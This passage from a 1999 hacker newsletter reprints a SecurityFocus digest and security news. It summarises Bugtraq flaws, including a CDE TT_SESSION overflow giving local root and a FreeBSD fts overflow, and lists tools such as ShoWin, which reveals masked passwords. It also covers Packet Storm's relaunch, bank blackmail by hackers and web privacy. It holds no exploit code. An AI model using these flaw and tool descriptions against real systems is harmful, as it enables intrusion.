client programs of ttsession may restart the daemon if it can not be found running. This explanation is quoted from the initial post on this problem by Job De Hass. This message is available in it's entirety in the 'Credit' section of this vulnerability entry. 10. Multiple Vendor CDE TT_SESSION Buffer Overflow Vulnerability BUGTRAQ ID: 641 Remote: No Date Published: 1999-09-13 Relevant BUGTRAQ: http://www.securityfocus.com/bid/641 Summary: The libtt.so shared library under certain versions of CDE handles a user defined variable titled TT_SESSION. The code which handles this variable does not place a restriction on it's size. At least one of the CDE programs which rely on this variable do not have sufficient bounds checking in place for this variable, this can result in a buffer overflow. The program in question is dtsession. Due to the fact that dtsession is running setuid root and does not remove the root privilege (at least as tested on Solaris), the overflow can lead to local root compromise. 11. FreeBSD fts Library Buffer Overflow Vulnerability BUGTRAQ ID: 644 Remote: No Date Published: 1999-09-16 Relevant URL: http://www.securityfocus.com/bid/644 Summary: Within Libc and in particular in the fts library functions a buffer overflow exists in certain FreeBSD installations. The fts routines are used by programs which need to traverse the files system of the host. Any series of startup scripts which do work within the file system may use fts. However, this particular overflow is related to the security checking scripts. The fts library functions had a buffer overflow in them where which would lead to a core dump when periodic ran the security checking scripts (or other scripts which traverse trees that can be controlled by users). periodic(3) should limit core size to zero to disable core dumps while it is executing commands, but does not do so. In addition, the kernel should not follow symbolic links. All three of these problems caused a situation where it was possible for an attacker could create or overwrite an arbitrary file on the system with a moderate degree of control of its contents to cause a problem. The vast majority of this description was taken from the FreeBSD Advisory FreeBSD-SA-99:05 which is available in it's entirety in the 'credits' section of this vulnerability entry. III. PATCH UPDATES 1999-09-11 to 1999-09-19 ------------------------------------------- This newsletter is somewhat spare on available patch information, however if you follow the URL's provided for the BUGTRAQ vulnerability issues you will find that most include patch information. Below is another update from ProFTPD. 1. Vendor: ProFTP Product: Proftpd Patch Locations: http://www.proftpd.org ftp://ftp.tos.net/pub/proftpd Vulnerability Patched: ProFTPD Remote Buffer Overflow Bugtraq ID: 612 Relevant URL: http://www.securityfocus.com/bid/612/ IV. INCIDENTS SUMMARY 1999-09-11 to 1999-09-19 ----------------------------------------------- 1. Stray FIN packets... Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-29&msg=199908302049.PAA06229@duckdog.zweknu.org V. VULN-DEV RESEARCH LIST SUMMARY 1999-09-11 to 1999-09-19 ---------------------------------------------------------- 1. Guestbook perl script (long) (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-09-8&msg=37DDF0E3.EBE5ABFE@thievco.com 2. VULN-DEV Administrivia #2143 Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-09-1&msg=37D1A8D3.9D30DCFB@thievco.com 3. Administrivia #2685 Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-09-15&msg=37E14BFD.ED7E08E5@thievco.com 4. [Fwd: your guestbook] Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-09-15&msg=37E13807.74F7C4D2@thievco.com VI. SECURITY JOBS 1999-09-11 to 1999-09-19 ------------------------------------------- Seeking Position: 1. Contact: M Simkin <msimkin@primenet.com> Qualifications: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-8&msg=199909150422.VAA218782@smtp05.primenet.com Date Posted: 09/14/99 Seeking Staff: 1. Nokia: SE Position Routing/Firewall/VPN Reply to: Edward Gibbs <ed@iprg.nokia.com> Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-8&msg=19990913183626.14399.qmail@securityfocus.com 2. System Administrator - Unix - New York City Reply to: Gould, Beau <beau@nyc-search.com> Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-8&msg=37DEC88D.75F7FBC0@nyc-search.com 3. Chief Security Officer #406 Reply to: Lori Sabat <lori@altaassociates.com> Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-15&msg=19990915145111.25367.qmail@securityfocus.com 4. Computer Systems Programmer Reply to: Gould, Beau <beau@nyc-search.com> Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-15&msg=37E06D54.ED7B3D3E@nyc-search.com 5. Information Security Analyst Reply to: Security Technology <security_technology@bigfoot.com> Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-15&msg=3.0.6.32.19990915172736.007bb2e0@mail.netzero.net 6. Information Security Engineer Reply to: Security Technology <security_technology@bigfoot.com> Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-15&msg=3.0.6.32.19990915172640.007ba440@mail.netzero.net 7. Project Manager for the Information Security Group Reply to: Security Technology <security_technology@bigfoot.com> Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-09-15&msg=3.0.6.32.19990915172533.007dbd40@mail.netzero.net VII. SECURITY SURVEY -------------------- The question for 1999-09-11 to 1999-09-19 was: How adequate do you think your incident response and disaster recovery procedures are? The answers were: 16% / 10 votes Excellent -- we have defined our risks and are aware of what we need to do 33% / 20 votes OK -- we know what to do, even though it's not documented 33% / 20 votes Poor -- we have the basic ideas, we'll figure the rest out if anything ever happens 16% / 10 votes Pathetic -- we are dead if a single host gets compromised VIII. SECURITY FOCUS EVENTS for 1999-08-29 to 1999-09-04 -------------------------------------------------------- 1. New Features In Tools Section Relevant URL: http://www.securityfocus.com/templates/announcement.html?id=31 The tools section has been updated, and now offers two major new features. Tools can now be sorted by platform, which will greatly streamline the process of finding a tool that works for you. Also, if you have found or written a tool that you think we should have, you can submit it to the website through your browser. IX. SECURITY FOCUS TOP 6 TOOLS --------------------------------- 1. Stack Shield 0.5 beta by vendicator@usa.net Relevant URL: http://www.angelfire.com/sk/stackshield The new Stack Shield 0.5 beta has been released. It has the capability to set the buffer size and the entry point. It can also exit on attacks and disable the protection system when too much calls are executed. 2. rinetd (for Win9x/NT) by Thomas Boutell <boutell@boutell.com> Relevant URL: http://www.boutell.com/rinetd/ Redirects TCP connections from one IP address and port to another. rinetd is a single-process server which handles any number of connections to the address/port pairs specified in the rinetd.conf file. Since rinetd runs as a single process using nonblocking I/O, it is able to redirect a large number of connections without a severe impact on the machine. This makes it practical to run TCP services on machines inside an IP masquerading Firewall. Persistent connection. Source code included. 3. rinetd (for Unix) by Thomas Boutell <boutell@boutell.com> Relevant URL: http://www.securityfocus.com/data/tools/rinetd_tar.tar Redirects TCP connections from one IP address and port to another. rinetd is a single-process server which handles any number of connections to the address/port pairs specified in the file /etc/rinetd.conf. Since rinetd runs as a single process using nonblocking I/O, it is able to redirect a large number of connections without a severe impact on the machine. This makes it practical to run TCP services on machines inside an IP masquerading Firewall. 4. Subotronic by Robin Keir <robin@keir.net> Relevant URL: http://www.securityfocus.com/data/tools/subotronic.zip A visual traceroute and Whois program. 5. ShoWin by Robin Keir <robin@keir.net> Relevant URL: http://www.securityfocus.com/data/tools/showin.zip Displays useful information about windows by dragging a cursor over them. It will also display the hidden password editbox fields (text behind the asterisks *****) and can enable windows that have been disabled and unhide hidden windows. 6. Boping by Robin Keir <robin@keir.net> Relevant URL: http://www.securityfocus.com/data/tools/boping.zip A scanner for the infamous Back Orifice program. This is many times faster than the ping sweeper built in to the original client program. I have included the ability to notify detected victims by sending them a BO messagebox message directly from within the program. This is intended as a vigilante tool to notify victims who unknowingly have the trojan on their system. X. SPONSOR INFORMATION - Tripwire Security ------------------------------------------ URL: http://www.tripwiresecurity.com/ This Newsletter was sponsored by Tripwire Security. Tripwire Security Systems, Inc. (TSS) is a Portland-based software development company specializing in system security and policy compliance applications. The company is developing a family of Defense in Depth(SM) security solutions based on its Tripwirefile integrity assessment technology. Tripwire's file integrity assessment technology is the most fundamental component of any Intrusion Detection system. Tripwire monitors all servers and clients on a network, detecting and reporting any changes to critical system or data files. Tripwire can absolutely, unequivocally determine if a protected file has been altered in a way that violates the policy set by the administrator. This ensures that any change, whether due to an external intruder or internal misuse, will be identified and documented on a timely basis. After an intrusion has been detected, Tripwire enables the system administrator to quickly identify which systems have been compromised, allowing the organization to get back to business. Alfred Huger VP of Operations Security Focus @HWA 08.0 PSS: Packet Storm Security comes "back" online ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Its back, minus Ken Williams, he is still listed on the contacts page but is no longer actively involved in the production of the web site. The site can be reached at http://packetstorm.securify.com PSS was aquired by Kroll O'Gara and Securify when Ken was forced to shut down his site at Harvard under false allegations and what can only be termed a smear campaign by JP (John Vranesvich) of AntiOnline.com (http://www.antionline.com) The site presents a reasonable interface and reports from the general public are so far good regarding response from the people running the site. The site was swamped within hours of its opening with 700,000 hits in the first 12 hrs and nearly 1.2 million hits in 24 hrs. We hope they have sturdy servers. :) Contacts for Packetstorm: ~~~~~~~~~~~~~~~~~~~~~~~~ Contacts For secure communications, please use PGP. PGP keys and fingerprints are here. matt@packetstorm.securify.com Matt Barrie - C in C silvertn@packetstorm.securify.com Michael Silverton - Chief Propaganda Officer und Spammeister jkwilli2@unity.ncsu.edu Ken Williams - C in C (retired: personal mail - no longer at Packet Storm) dcdc@packetstorm.securify.com Dean Clayton Digital Creations - Graphic Design webmaster@packetstorm.securify.com Web Master submissions@packetstorm.securify.com File and news submissions and updates help@packetstorm.securify.com Help? security@packetstorm.securify.com Site security, emergencies support@packetstorm.securify.com Support comments@packetstorm.securify.com Got a comment? abuse@packetstorm.securify.com REAL complaints handled here exploits@packetstorm.securify.com Questions and comments about exploits and vulnerabilities crypto@packetstorm.securify.com Crypto and stego questions and comments admin@packetstorm.securify.com System Administrator devnull@packetstorm.securify.com 98% of the mail winds up here geekgirl@packetstorm.securify.com Geek Girl bugboy@packetstorm.securify.com Bug Boy cerberus@packetstorm.securify.com Packet Storm Slave media@packetstorm.securify.com All press, media, interview requests Press release: ~~~~~~~~~~~~~~ Wednesday September 22, 7:01 am Eastern Time Company Press Release SOURCE: Kroll-O'Gara Information Security Group Kroll-O'Gara ISG Launches Packet Storm, the World's Largest Internet Security Resource PALO ALTO, Calif., Sept. 22 /PRNewswire/ -- Packet Storm, the world's largest Internet security resource, opened its Web site to the public today. A service of the Kroll-O'Gara Information Security Group (ISG), Packet Storm is a massive repository of tools, advisories, patches, and solutions, consisting of over 45,000 security related items. Packet Storm is recognized as the leading security destination on the net, averaging over 300,000 hits per day. Packet Storm is located at http://packetstorm.securify.com . Regular users of Packet Storm include international and domestic corporations, leading information technology companies, government, and law enforcement agencies. Business and government IT managers consider Packet Storm the premier site for obtaining up-to-date information on the latest threats that face computer networks and information systems. ``The goal of enterprise information protection is to identify and select appropriate safeguards to protect physical and financial resources, intellectual property, employees, and other tangible and intangible assets. Therefore, it is imperative to stay up to date with the latest vulnerability data,'' stated Dr. Taher Elgamal, president of Kroll-O'Gara ISG. Packet Storm has a well-established reputation within the information security community as the best site for obtaining the latest security resources available on the net. The site includes instant-access search filters for identifying up-to-the-minute updates and tools which enable IT managers to quickly find the solutions they need. ``Any company that builds enterprise-wide or e-commerce networks, that wishes to protect their existing networks, or has just been hacked, should come to Packet Storm,'' said Matt Barrie, Packet Storm Program Manager. Packet Storm is the world's largest Internet security resource, employing the industry standard Apache Web server with Network Flight Recorder, the most popular intrusion detection and monitoring system, all running on FreeBSD, renowned for its superior network performance, security, and robustness. Packet Storm is at http://packetstorm.securify.com . About Kroll-O'Gara ISG, a subsidiary of the Kroll-O'Gara Company (Nasdaq: KROG - news) The Kroll-O'Gara Information Security Group is composed of highly regarded industry experts that provide objective information security services to businesses and government agencies. Services include network security review and repair, product assessment, design and implementation of secure architectures for e-commerce sites. Kroll-O'Gara ISG is unique in the security field because it not only provides assessments and recommendations, but also manages implementation and deployment. For information, visit their Web site at www.kroll-ogara.com. About the Kroll-O'Gara Company The Kroll-O'Gara Company (KROG) is a leading global provider of a broad range of specialized products and services designed to supply solutions to a variety of security needs. Kroll-O'Gara provides governments, businesses and individuals with information, analysis, training, advice and products to mitigate the growing risks associated with fraud, electronic threats, physical threats and uninformed decisions based upon incomplete or inaccurate information. The Company is organized into three primary business groups: Investigations & Intelligence Group, Security Products & Services Group and Information Security Group. Kroll-O'Gara employs more than 2,600 people in over 60 offices and plants around the world. For information, visit their Web site at www.kroll-ogara.com. SOURCE: Kroll-O'Gara Information Security Group FreshMeat announcement: ~~~~~~~~~~~~~~~~~~~~~~ Packet Storm back online scoop - September 23rd 1999, 19:12 EST After being shut down on July 1st due to a lawsuit threat to Harvard University, the Packet Storm Internet Security Resource is back online. Packet Storm (which has been acquired by Securify aka Kroll-O'Gara in the meantime) provides users with up-to-date information on the latest threats that face corporate networks and computer systems. Kroll-O'Gara ISG launches Packet Storm, the world's largest Internet Security Resource PALO ALTO, Calif., September 21, 1999 Packet Storm, the world's largest Internet security resource, opened its web site to the public today. A service of the Kroll-O'Gara Information Security Group (ISG), Packet Storm is a massive repository of tools, advisories, patches, and solutions, consisting of over 45,000 security related items. Packet Storm is recognized as the leading security destination on the net, averaging over 300,000 hits per day. Packet Storm is located at packetstorm.securify.com. Regular users of Packet Storm include international and domestic corporations, leading information technology companies, government, and law enforcement agencies. Business and government IT managers consider Packet Storm the premier site for obtaining up-to-date information on the latest threats that face computer networks and information systems. "The goal of enterprise information protection is to identify and select appropriate safeguards to protect physical and financial resources, intellectual property, employees, and other tangible and intangible assets. Therefore, it is imperative to stay up to date with the latest vulnerability data," stated Dr. Taher Elgamal, president of Kroll-O'Gara ISG. Packet Storm has a well-established reputation within the information security community as the best site for obtaining the latest security resources available on the net. The site includes instant-access search filters for identifying up-to-the-minute updates and tools which enable IT managers to quickly find the solutions they need. "Any company that builds enterprise-wide or e-commerce networks, that wishes to protect their existing networks, or has just been hacked, should come to Packet Storm," said Matt Barrie, Packet Storm Program Manager. Packet Storm is the world's largest Internet security resource, employing the industry standard Apache web server with Network Flight Recorder, the most popular intrusion detection and monitoring system, all running on FreeBSD, renowned for its superior network performance, security, and robustness. Packet Storm is at packetstorm.securify.com About Kroll-O'Gara ISG, a subsidiary of the Kroll-O'Gara Company (KROG) The Kroll-O'Gara Information Security Group is composed of highly regarded industry experts that provide objective information security services to businesses and government agencies. Services include network security review and repair, product assessment, design and implementation of secure architectures for e-commerce sites. Kroll-O'Gara ISG is unique in the security field because it not only provides assessments and recommendations, but also manages implementation and deployment. For information, visit their web site at www.kroll-ogara.com. About the Kroll-O'Gara Company The Kroll-O'Gara Company (KROG) is a leading global provider of a broad range of specialized products and services designed to supply solutions to a variety of security needs. Kroll-O'Gara provides governments, businesses and individuals with information, analysis, training, advice and products to mitigate the growing risks associated with fraud, electronic threats, physical threats and uninformed decisions based upon incomplete or inaccurate information. The Company is organized into three primary business groups: Investigations & Intelligence Group, Security Products & Services Group and Information Security Group. Kroll-O'Gara employs more than 2,600 people in over 60 offices and plants around the world. For information, visit their web site at www.kroll-ogara.com. Q & A with Packetstorm maintainer Matt Barrie ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Q & A with Packetstorm maintainer Matt Barrie By xix on September 11th, 1999 Matt Barrie has taken over the reigns of the Packetstorm security archives. The archive is the largest freeware security archive on the net and was taken down and displaced due to legal issues between the hacker site Antionline and the former maintainer/owner of Packetstorm Ken Williams. Please give us some background information about you Matt. Currently I am the maintainer of Packet Storm, though it still hasn't been determined whether not I will continue to be long term. We're rapidly growing the Packet Storm team, so who knows what things will look like in a few months. To tell you a few things about myself, I run the Network & Systems Assessment Practice Area, which is part of the consulting group at Kroll-O'Gara ISG; in that group we do things like Penetration Testing, Incident Response, Physical Security, and obviously, Network Assessment. My clients are mostly Fortune 500-type companies and are from all over the world. Before this for a couple of years I ran a company doing similar things in Australia, called Infilsec Pty. Limited. Are all the archives of former Packetstorm intact? Almost entirely. We have, as part of a general cleanup of the site, removed an insignificant amount of information that didn't really fit in with the site's focus on Information Security. There may be one or two sections, though, which may not be ready in time for the site launch, such as the massive cryptography archive. Naturally, we need to make sure that we've taken all the proper steps to ensure that we're doing everything by the book. What new features will we see from the new site? The site will retain the same focus and vision that Ken Williams had when he was maintaining it; only it will be bigger & better. We're overhauling the site, touching it up a little and making it a bit simpler to navigate and use. We'll be using Apache running on FreeBSD in our web farm, and will be watching all the interesting things that'll be going on with NFR and a couple more toys we have here. Of course, this will all be an on-going thing. We're also streamlining some of its operation. Tell us about Kroll-O'Gara and their involvement. Packet Storm is part of the Information Security Group at Kroll-O'Gara. Kroll-O'Gara is the world's leading risk mitigation company (NASDAQ:KROG). Kroll-O'Gara is divided into three groups; Risk Control Services (RCS), who do everything from forensic accounting, business & investigations intelligence, to asset tracing and surveillance; the Security Products and Services Group (SPSG) who do, amongst other things, armouring of commercial and military vehicles; and the Information Security Group (ISG) - us. We provide information security services related to Network Architecture & Design, e-Commerce, Policy, Product Assessment, PKI, and Network & Systems Assessment. Can we expect Packetstorm to continue to be the largest security archive on the net? Definately! Ken found that as the site grew, it got to the point that he was running out of hours in the week. Even forgoing food and sleep, there's only 168. With the resources & staffing we're committing to the site, we'll be able to maintain Packet Storm as #1 for security resources. We've recommended that Ken take a well earned rest, go jump in that Camaro SS and go on a holiday to a remote beach somewhere and try to get a tan that isn't generate by electron beams. Of course, knowing Ken he's still working :) What do you think of the SecurityFocus.com website and what they have done? I think they've got an excellent site, and it's great to see more places starting up devoted to Information Security. With Bugtraq now being run from there, with its explosive growth in readership, SecurityFocus is going to be fostering a first rate security community. I have noticed over the years that many more exploits and fixes are found for *nix based operating systems, what would you say the percentage of Packetstorm archives consist of...more for nix system or more for window systems? Just because more vulnerabilities are found in a particular operating system doesn't mean that it's worse. In fact- far from the case. More bugs tend to be reported for UNIX because of the mostly open nature of its source, full-disclosure mailing lists, and so on. This all helps to make UNIX an extremely stable and well-written platform. With the source code to Windows being proprietary, and Microsoft not being exactly willing to expose Window's internal workings, it makes it that much harder for the security community to find and help fix bugs. As a result, who knows what the true qualitative difference is between the two platforms with respect to bugs. A couple of years ago there was all this talk about "Is UNIX dead?" with NT out and having relatively few bugs being reported. But now people have started reverse engineering the internals of the operating system and I'm amazed by some of the sorts of crazy things that are being found. How do you feel about Redhat's success, do you think it will fragment the Linux community? I think any success for Linux in entering the mainstream is a good thing. It's about time we had cheap, industrial strength OS alternatives. Now that the more traditional vendors are putting their support behind companies like RedHat; investing in them, shipping their Linux distributions out of the box, and so on, it has really become accepted as a serious alternative to using Windows or more expensive distributions of UNIX. Do you expect to see a lot of problems submitted from the upcoming Windows2000 operating system? What do you think? :) Will you continue to carry directories about AntiOnline and HappyHappy hacker information? Well I suspect you're trolling about that one. We understand that in the past that Ken and AntiOnline etc. have had their differences. As new owners of the site we don't wish to partake in any of this. If they provide useful information about Information Security, we'd be more than happy to add it to our archive. Will there be an elaborate web page front end for the new Packetstorm or strictly similiar to the older one focusing on the archives only? You'll have to wait and see :) We plan on having the site up September 22, if all goes to plan with the co-location facility. Thanks for the opportunity to talk to you about Packet Storm. We're determined to maintain it as the world's largest resource for Internet Security Solutions. Of course, this would be impossible without the valuable support of the security community; hackers, engineers, programmers, vendors, admins and geeks alike! "Windows 95: 32-bit extensions and a graphical shell for a 16-bit patch to an 8-bit operating system originally coded for a 4-bit microprocessor, written by a 2-bit company that can't stand for 1 bit of competition." - Unknown Got shares yet?? ~~~~~~~~~~~~~~~~ Stock of the Day Sep 10, 1999 Kroll-O'Gara: Bullets Fly, But the Shares Should Come Back to Life by Bob Hirschfeld 9/10/99 Back in 1997, Jules Kroll and Thomas O'Gara decided to join forces. Kroll had a great deal of admiration for O'Gara's armored limousine business. And O'Gara thought highly of Kroll's lucrative business of providing security for corporate executives. Since then, the combined entity, Kroll-O'Gara (NASDAQ:KROG - news) has posted heady growth in sales and profits. In its most recent quarter alone, sales rose by 29% to $76.5 million, fueling a 43% jump in profits, to $5.3 million. A 6% increase in gross margins gets the credit for the outsized profit gain. Investors, though, have not been too enamored with the union. For shares of Kroll-O'Gara fell nearly 60% to $17.50, before recovering somewhat to a recent $22.94. Rumors of a power struggle between O'Gara and Kroll have led some to conclude that the company is headed for a break-up. Hogwash, says Warburg Dillon Read's Tom O'Halloran. He says that no dispute currently exists between the leaders and the shares have been penalized unfairly. As time passes, and the management team remains intact, investors should refocus their sights on the company's strong growth prospects, much of which is fueled by a spate of recent acquisitions. The company has added 17 security-related companies over the past two years, and five this year alone. Those deals have helped the company flesh out its product lines in its two main divisions: Investigations & Intelligence (which comprised 60% of second quarter revenue), and Security Products & Services (38%) and principally known for its armored vehicles). Continuing its acquisition skein, on June 3, the company spent $20 million to buy Buchler Phillips, a U.K. firm that helps financially troubled companies to restructure. The purchase represents an extension of Kroll-O'Gara's risk-management business to financial services. The thinking here is that companies beset by fraud may be headed toward bankruptcy. If so, they require the kinds of restructuring services offered by Buchler Phillips, which helps companies restructure following "these kinds of incidents," according to O'Gara. In a more recent acquisition, Kroll purchased Packet Storm Security, a company that provides users with computer security threat information and offers an Internet site that will help customers obtain information to ensure that their networks are secure. The acquisition builds upon earlier computer security services acquisitions, and expands the company's Internet presence. O'Halloran, in analyzing the second quarter, applauded the strong revenue growth of 26%, which exceeded his 21% estimate, though he was a bit concerned that operating expenses fetched a larger share of revenue than they did a year ago. The analyst kept unchanged his 1999 and 2000 per-share estimates of $1.17 and $1.55. However, he expects third and fourth quarter growth rates to improve, given new Investigation & Intelligence businesses, new government contracts, and lower selling, general and administrative expenses as a percent of revenue. Of note is the fact that the company's military products (such as its up-armored HumVee, which has seen duty in Bosnia), enjoy a backlog of roughly $27 million. With commercial backlog at about $20 million, at least 25% of second half revenue can be considered secure. O' Halloran notes that shares currently trade at about 12 times his 2000 earnings estimate, less than half the projected growth rate. O'Halloran forecasts EPS to increase 50% in 1999 and 32% in 2000. The analyst claims that, given the company's growth record, shares deserve a 25 multiple. Bottom Line: Using the analyst's 2000 forecast of $1.55, that establishes a target of $39 on shares, a 70% premium to current share prices. @HWA 09.0 British Banks Suffer Blackmail Attempts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by dis-crete The London Times reports that British banks are being blackmailed by "hackers" who have penetrated computers. It reported that ransoms of hundreds of thousands of pounds have been demanded from several different banks. It is hard to weed out the verifiable facts from the rumor and innuendo in this article. It would seem that blackmail threats are rather common in the EU but the article doesn't seem to mention if these were more than just threats. The Sunday London Times http://www.the-times.co.uk/news/pages/sti/99/09/19/stinwenws01021.html?999 Hackers hold City banks to ransom Jon Ungoed-Thomas and Maeve Sheehan BRITISH banks are being blackmailed by hackers who penetrate their security systems and threaten to cripple their computers or publish stolen files, a Sunday Times investigation has found. Ransoms of hundreds of thousands of pounds are being demanded by the hackers and one European bank has admitted it was a victim of the racket. City investigators say at least two London financial institutions have paid out ransoms totalling more than �1m. The blackmail threats underline the dangers posed by criminals who "crack" computer security systems. GCHQ, the government's electronic surveillance centre in Cheltenham, is so concerned by the threat that it is to help key companies safeguard themselves. About 30 international banks have admitted serious security attacks on their networks last year. Trading, accounting and communication departments are among those that have been "ransacked" at a cost of more than �5m. One German bank, Noris Verbraucherbank, was targeted by a hacker who claimed he had raided customer accounts and stolen bank access codes. Executives offered a reward for his capture in January last year after he demanded a �300,000 ransom. City investigators claim the case is not an isolated one. "There have been a number of cases in the UK where hackers have threatened to shut down the trading floors in financial institutions," said Mark Rasch, a former attorney for computer crime at the United States justice department. "The three I know of [in London] happened in the space of three months last year one after the other." Rasch now works as a legal counsel for Global Integrity, a computer security company. "There was the same pattern - a high ransom for millions was initially demanded, but then it started to come down. In one case, the trading floor was shut down and a ransom paid." In another incident last year, an extortionist threatened to publish the stolen client database of a London financial institution unless he was paid a �1m ransom. Executives called in private investigators, but settled the ransom rather than risk confidential company information being published on the internet. A survey by Global Integrity of 50 of the world's largest banks has revealed that more than half suffered one significant network attack last year. While the most adept hackers - such as Vladimir Levin, the Russian graduate who transferred more than �6m from Citibank in New York after logging on the network from a laptop in Moscow - will seek to steal funds, it is easier to steal information or disable systems. Corrupt employees are responsible for the vast majority of extortion attempts, but external hackers regularly probe bank security systems. The International Chamber of Commerce (ICC), which is shortly to launch a dedicated cyber crime unit to advise members on the threat, last week confirmed it had received several reports of attempted extortion but was unable to release any figures. It is one of several computer crime issues that will be addressed at an ICC conference on cyber crime in December. "We have had cases of extortion and the matter has been investigated internally and the threat removed," said Pottengal Mukundan, director of commercial crime services at ICC. "I don't think you will find there are many companies which admit to having a problem." Edward Wilding, director of computer forensics at Maxima Group, said his firm investigates about four cases of attempted cyber extortion a year for multinationals and financial institutions. "Computer extortion is not rife, but we do get called to assist in incidents where extortionists have attempted to extract money by the use of encryption and where databases of sensitive information have been stolen," he said. Companies which are worried about hackers can get advice from the Communications Electronics Security Group, a branch of GCHQ. From next month, it is offering to inspect sensitive computer systems of key companies. Additional reporting: Jessica Berry @HWA 10.0 You Have No Privacy On The Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ As HNN's privacy statement says in its title; "You have zero privacy anyway, Get over it." From HNN http://www.hackernews.com contributed by Weld Pond A new report recently released by Forrester Research, Inc., claims that 90 percent of Web sites fail to comply with basic privacy principles. This reports is 180 degree turn from what the FTC has told congress, that industry self-policing is working. E Commerce Times http://www.ecommercetimes.com/news/articles/990916-3.shtml Forrester Research, Inc http://www.forrester.com/ HNN Privacy Statement - Read It and Judge for Yourself http://www.hackernews.com/misc/privacy.html E Commerce Times; Report Labels Internet Privacy Policies 'A Joke' By Chet Dembeck E-Commerce Times September 16, 1999 According to a new report from Forrester Research, Inc., 90 percent of Web sites fail to comply with basic privacy principles. The report vehemently contradicts the findings of the Federal Trade Commission, which recently told Congress that industry self-policing is working. Forrester feels that "most privacy policies are a joke." It added that the vast majority of such policies, like those of the Gap, Macy's and JC Penney, use vague terms and legalese that serve to protect companies and not individuals. Few Follow Fair Information Guidelines In addition, the report finds that just 10 percent of e-commerce sites adequately address the basic fair information guidelines that were established by the government and industry to protect privacy. The recent security breach of Microsoft's Hotmail and the unintended profile usage in Amazon.com's "Purchase Circles" underscore the problem. Third-party Privacy Programs Not Being Used Seal programs such as TRUSTe and BBBOnline have gained little traction, the report says. Truste has only 500 licensees and BBBOnline, which provides consumer complaint resolutions, has only 42. Forrester adds that while e-tailers barely comply with weak privacy policies, new technology is enabling them to "collect, dissect and use even more personal visitor-behavioral data." Interactive Tools Become Digital Wiretappers According the report, clever interactive tools such as Reel.com's Mood Matcher -- which helps customers find movies based on their moods -- and PlanetRx's personalized prescription filler make it possible for companies to collect "highly intrusive psychographic data that individuals would rarely provide on a standard registration form." In addition, Forrester said that there is growing industry pressure to share such data with "partners." It reports that DoubleClick and BEFree already provide services such as advertising networks and affiliate programs across multiple sites. The report also indicates that there is an alarming trend among e-tailers to incorporate artificial intelligence tools into their storefronts -- the same kind of tools used by government intelligence communities to covertly gather information. Recommends FTC Take A Stronger Stand Forrester concludes that without forceful action by the FTC, the privacy issue could easily spin out of control and hobble consumer e-commerce. The report suggests that the FTC, rather than pumping out reassuring messages to the industry, take the following steps: o Sound the warning signal early. Rather than burying its head in the sand, the FTC should be pushing companies to take bigger and faster strides toward complying with already established privacy principles. o Push for open profiles. Companies should be required to make customer profiles available to users, similar to the My CDNOW section of CDNOW. The profile should contain all partners with whom data is shared, the ability for customers to control who the information is shared with and the option to remove themselves from the list. o Pressure third party privacy firms. Because independent privacy groups like Truste and BBBOnline earn their money from e-commerce organizations, they become more of a privacy advocate for the industry -- rather than for consumers. The FTC should call for a consumer-based organization to provide principles and redress. -=- HNN Privacy Statement "You have zero privacy anyway, Get over it." - Scott McNealy, Chief Executive Officer, Sun Microsystems, Inc. You have no Privacy. Remember that. So what is the purpose of this document? Well Microsoft and IBM will not advertise on web sites without "Privacy Statements". Where Microsoft and IBM travel others are sure to follow. So to appease the advertising companies we post this document, not because it will make any difference in the long term but to make some people feel good. Like it or not about the only way HNN can pay its bills is with banner ads. No one likes them. But without them we would not be able to buy any beer and that would be worse. Face it this site is a lot of work and if it wasn't for the fifty bucks in beer money those banner ads earn us each month it is doubtful HNN would exist in the same format. We have to get drunk once in a while. So to appease the people with the money (i.e. advertisers) we will post a privacy statement that details what we will and will not do with any information you choose to provide to HNN. This is just a statement. Of course we reserve the right to change this policy at any time and we may or not update this page. Since there is no law that says we have to, why bother. If you do not want to provide any information to HNN and wish to remain completely anonymous (to us anyway) then don't visit the site, or check out the folks at Zero Knowledge (we sure hope they go gold soon). Just by visiting you are giving us information about you. Information we log, and store, and look at, and analyze and drool over while we drink the aforementioned beer. Yes, we lead exciting lives. By connecting to HNN via http (the web) you provide us, and any other web site, your IP address, your browser type, your operating system, etc... all standard web log stuff. Nothing to personal. If your DNS actually resolves then we can find out approximately what part of the world you are in and who your ISP is. Do we have time to do all that? No. Do we want to? No. Do we care? No. Does it all get written down in logs for us to look at if we so choose? Yes. If you choose to send us mail with our online web forms there is data gathered there too. Web forms are not anonymous. Not on our site or any other. Web forms will automatically grab your IP address, browser and OS types, and append that information to the email. Do we do anything with this information? No. We do use it internally sometimes to verify when one person is trying to send us bogus stories, though. If you choose to send us mail with the likes of HotMail, Yahoo, or any one of the dozens of other free email services you should be aware that the IP address of the person who composed the email is usually stored within the header. Again, we don't do anything with this information other than to determine where certain stories are from. Email is stored locally for approximately one month, sometimes less, sometimes more. Depends on how much we have had to drink and how full the hard drive is. Then it gets deleted never to be seen again. At the moment the machine that email is stored on is not backed up so don't worry about the feds taking all of our old tapes. We will absolutely NOT harvest email address from our received email and sell them to advertisers (Yes, we have been asked to sell such lists). SPAM is evil, and must be stopped. We will not contribute to its propagation under any circumstances! Speaking of the authorities, if they ever show up with a search warrant they can gladly have all of our equipment. I just hope they bring a very large truck and several burly moving men. What this means to you is DO NOT send us email about illegal activities you are planning. This only implicates us and forces us to inform the authorities. Yes, we will do that. We have a moral obligation to report crimes and do not encourage such activities. So what can you do about your general 